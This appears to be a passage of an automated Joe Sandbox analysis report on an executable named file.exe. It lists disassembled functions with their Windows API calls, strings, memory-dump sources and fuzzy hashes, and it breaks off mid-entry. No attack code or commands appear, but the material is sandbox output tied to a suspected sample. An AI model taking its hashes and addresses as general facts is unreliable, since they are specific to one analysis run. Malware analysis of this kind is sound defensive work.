                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    • Opcode ID: a392ff57fa0e46782573f9162e709e8df47827c76cead1ed1f025fe9bcc5cd00
                                                                                    • Instruction ID: b0233a02a86db46926a56cfd2542a2c78adae29fe83af90cc5e42c8de3d55728
                                                                                    • Opcode Fuzzy Hash: a392ff57fa0e46782573f9162e709e8df47827c76cead1ed1f025fe9bcc5cd00
                                                                                    • Instruction Fuzzy Hash: 030128339882257BE1294E659E88F377B6CEB86F41F100416F600F38A0C356ACA59772
                                                                                    Function 00174ADF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00174A90,?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002), ref: 00174AFF
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00174B12
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00174A90,?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174B35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 9854223ed4c2ca2a6c7a508ae59bffc791b9f14a2402042d74946cea6c4da89b
                                                                                    • Instruction ID: 1af528a0b51eebcd2ee1061d36ff7d0b89cdb6e5ee17066f9d6afb5167f1bf32
                                                                                    • Opcode Fuzzy Hash: 9854223ed4c2ca2a6c7a508ae59bffc791b9f14a2402042d74946cea6c4da89b
                                                                                    • Instruction Fuzzy Hash: 1CF04F31A0420CBFCB56AF94DC59BAEBFB9EF08751F004068F809A6150DB758F84CB90
                                                                                    Function 0015DEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                      • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0015DED4
                                                                                    • GetProcAddress.KERNEL32(00191E58,CryptUnprotectMemory), ref: 0015DEE4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                    • API String ID: 2141747552-1753850145
                                                                                    • Opcode ID: 5cd33ea3eee871d1ae7e3c92b025d606872a0d2eb007e3aec16f01b2425f4d49
                                                                                    • Instruction ID: 60d3f3eefde5d452149e2fd94b3e42bcac9f5716b917772245b18e0f8d16b611
                                                                                    • Opcode Fuzzy Hash: 5cd33ea3eee871d1ae7e3c92b025d606872a0d2eb007e3aec16f01b2425f4d49
                                                                                    • Instruction Fuzzy Hash: 2FE04FB050174BAEDB926B75AC09B05FB94BF68751F208555F424C6640EBB4D2ACCF50
                                                                                    Function 001752F0 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: d952a554c256bacf3ab06b0ce0e4771b6d6dd3078d1a9c328c1c67fd994b4f84
                                                                                    • Instruction ID: d7c47ac66dea9eef43faa17fef842c0a448ccc37a67df5837e139a3974b149da
                                                                                    • Opcode Fuzzy Hash: d952a554c256bacf3ab06b0ce0e4771b6d6dd3078d1a9c328c1c67fd994b4f84
                                                                                    • Instruction Fuzzy Hash: 0B41D272A006049FDB14DF78C885A5EB7F6FF88314F158569E519EB291EBB1AD01CB80
                                                                                    Function 001789AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 001789B8
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001789DB
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00178A01
                                                                                    • _free.LIBCMT ref: 00178A14
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00178A23
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    • Opcode ID: 67650fecb1d4e992d2f2a3216c7e3bed456ece01bab65bee56c9682ba3636ca2
                                                                                    • Instruction ID: 5d61ec1664636545dc3bdcc09fe47f0afaf62e02ebdb45ea00c8c661ce89f9b5
                                                                                    • Opcode Fuzzy Hash: 67650fecb1d4e992d2f2a3216c7e3bed456ece01bab65bee56c9682ba3636ca2
                                                                                    • Instruction Fuzzy Hash: 63018472A416197B272156BA5C8CC7B6A7DDFCAFB0315412AF908D3101EF708D0182B1
                                                                                    Function 001763A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,00175E43,00175ADF,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 001763A8
                                                                                    • _free.LIBCMT ref: 001763DD
                                                                                    • _free.LIBCMT ref: 00176404
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176411
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 0017641A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 9bcf1987c2a1b17771283cb7a4bf3d058caaf939ff1f1a79820e97d7289282dc
                                                                                    • Instruction ID: 869e861887c150c9de21e8d4a2fe587bcd8fdb4391420948b0c2456d0f70318d
                                                                                    • Opcode Fuzzy Hash: 9bcf1987c2a1b17771283cb7a4bf3d058caaf939ff1f1a79820e97d7289282dc
                                                                                    • Instruction Fuzzy Hash: C7014476345F006BC71667342C89A2B363EEFE13B5B31C038F62DA2182EF718D008260
                                                                                    Function 0017926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00179282
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 00179294
                                                                                    • _free.LIBCMT ref: 001792A6
                                                                                    • _free.LIBCMT ref: 001792B8
                                                                                    • _free.LIBCMT ref: 001792CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 997ce26b85621e13be91d8e725a2e9a21363395f83357d3e310e7fa5b8b3b32d
                                                                                    • Instruction ID: c123b12fe0dce9f28df2b3f286595286fc6f45faf90c1e3bb4b14de39b95cb84
                                                                                    • Opcode Fuzzy Hash: 997ce26b85621e13be91d8e725a2e9a21363395f83357d3e310e7fa5b8b3b32d
                                                                                    • Instruction Fuzzy Hash: B4F04F32605700FB9A20FB68E882C4673FAAF113217948806F54CD7912CB75FCC18660
                                                                                    Function 0017553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017555D
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 0017556F
                                                                                    • _free.LIBCMT ref: 00175582
                                                                                    • _free.LIBCMT ref: 00175593
                                                                                    • _free.LIBCMT ref: 001755A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: ee704ee40e0681bd6fd2b3f62edb2d888ae95c110a33254e4e085c6fcf3a2a47
                                                                                    • Instruction ID: 67afe9834ab2eac360e55b87c1aaec260cef0991d2c2755429ed9ec162c36fa2
                                                                                    • Opcode Fuzzy Hash: ee704ee40e0681bd6fd2b3f62edb2d888ae95c110a33254e4e085c6fcf3a2a47
                                                                                    • Instruction Fuzzy Hash: B5F05EB0916A60DF8F06AF78FC414483BB2FF16B21385810BF41852A72C77A0981DBA3
                                                                                    Function 00174BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00174C1A
                                                                                    • _free.LIBCMT ref: 00174CE5
                                                                                    • _free.LIBCMT ref: 00174CEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                                    • API String ID: 2506810119-1957095476
                                                                                    • Opcode ID: de2459ea93bfa9acc17c03f2d28f91e0ab76ff5ea57179e946ec54989d49fc58
                                                                                    • Instruction ID: 9d71b75e604413f5fa5916c7a466ff2bdf51157498d909cac177af76794232ce
                                                                                    • Opcode Fuzzy Hash: de2459ea93bfa9acc17c03f2d28f91e0ab76ff5ea57179e946ec54989d49fc58
                                                                                    • Instruction Fuzzy Hash: 0B319471A05258EFDB22DF99DC8599EBBFCEF95310F118066F90897211D7708E80CB91
                                                                                    Function 00157463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00157468
                                                                                      • Part of subcall function 00153AA3: __EH_prolog.LIBCMT ref: 00153AA8
                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0015752E
                                                                                      • Part of subcall function 00157A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00157AAC
                                                                                      • Part of subcall function 00157A9D: GetLastError.KERNEL32 ref: 00157AF2
                                                                                      • Part of subcall function 00157A9D: CloseHandle.KERNEL32(?), ref: 00157B01
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3813983858-639343689
                                                                                    • Opcode ID: 9b84dadd82598c020de4d44ebdfa4f23b4b60df23733075bab2408ad3c245092
                                                                                    • Instruction ID: 7583e01722d2f75b7a360ee6450eb6ea065beadf29b86815c13a45ad533991b3
                                                                                    • Opcode Fuzzy Hash: 9b84dadd82598c020de4d44ebdfa4f23b4b60df23733075bab2408ad3c245092
                                                                                    • Instruction Fuzzy Hash: B131D571904248EEDF11EF68EC03BEE7B78AF55345F004029FC65AB192D7704A48CBA1
                                                                                    Function 0016A8D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperW.USER32(?,?,?,?,00001000), ref: 0016A92C
                                                                                    • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0016A953
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharUpper
                                                                                    • String ID: -
                                                                                    • API String ID: 9403516-2547889144
                                                                                    • Opcode ID: 599dbb343c671a54b67d63595d37c928eae73838d0b9b11ad278ca5b4788cbd1
                                                                                    • Instruction ID: 7bff409e8c52ea465222a15bcc40fb102c05d7a5fcc9034d3b9a6dbcbca285b2
                                                                                    • Opcode Fuzzy Hash: 599dbb343c671a54b67d63595d37c928eae73838d0b9b11ad278ca5b4788cbd1
                                                                                    • Instruction Fuzzy Hash: 6321057340420695D325EB288C0CB7BB698EF5531DFA2482BF495E6841E774D8F8DBA3
                                                                                    Function 00169123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 001691AB
                                                                                    • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 001691C0
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 001691D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: 6ca8786ff9b0253f5b73c100f9a4f9e06b53accab2f212a795af0c0b8cd86a92
                                                                                    • Instruction ID: 49cf9169058bfd35a6c3cbcf39bdf66c891e7321f28347352cd68fa725562b6a
                                                                                    • Opcode Fuzzy Hash: 6ca8786ff9b0253f5b73c100f9a4f9e06b53accab2f212a795af0c0b8cd86a92
                                                                                    • Instruction Fuzzy Hash: EE11D332241203BFE215ABA4DD4DF663BADAF4B725F210010F6419B8A0C3729D69DB22
                                                                                    Function 00169646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 00169694
                                                                                    • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 001696AC
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 001696DA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1
                                                                                    • API String ID: 445417207-3292211884
                                                                                    • Opcode ID: 469fce5927a91c06e27b5dce30d5bd77e4bb8149276ae6af0b2a91d51130dac2
                                                                                    • Instruction ID: 344a2ba8d4a42f2c29c86a9d2b4539011e8d12247440ed5b09d32d37e1c53357
                                                                                    • Opcode Fuzzy Hash: 469fce5927a91c06e27b5dce30d5bd77e4bb8149276ae6af0b2a91d51130dac2
                                                                                    • Instruction Fuzzy Hash: 21110432904219B7EB25AE64DD49FFA376CEF19750F010022FA49F7880C7B5AE6497B1
                                                                                    Function 0015B100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0015B127
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0015B145
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0015B155
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    • Opcode ID: 62b405175dd6a8cc326a1ab06a5de7e605ad8dc7baf7da211ce91330a97b35e6
                                                                                    • Instruction ID: 893a0969a008273fbf9ad07f25b12768ac98bf2dc40ad63e3ec4ca56f4ea926d
                                                                                    • Opcode Fuzzy Hash: 62b405175dd6a8cc326a1ab06a5de7e605ad8dc7baf7da211ce91330a97b35e6
                                                                                    • Instruction Fuzzy Hash: A901F913508711F5C6706B65ACC1C6BB7BCEF65361B50841BFC68DA481FB30D859C2B1
                                                                                    Function 0015F930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(000001A0,00191E74,00000000,?,?,0015FB88,00000020,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?), ref: 0015F969
                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F973
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F983
                                                                                    Strings
                                                                                    • Thread pool initialization failed., xrefs: 0015F99B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: d60f1059c2cc0b2ff023520d0019bd05b5a0f0ac0f5ab4a95a0593abc41cd69e
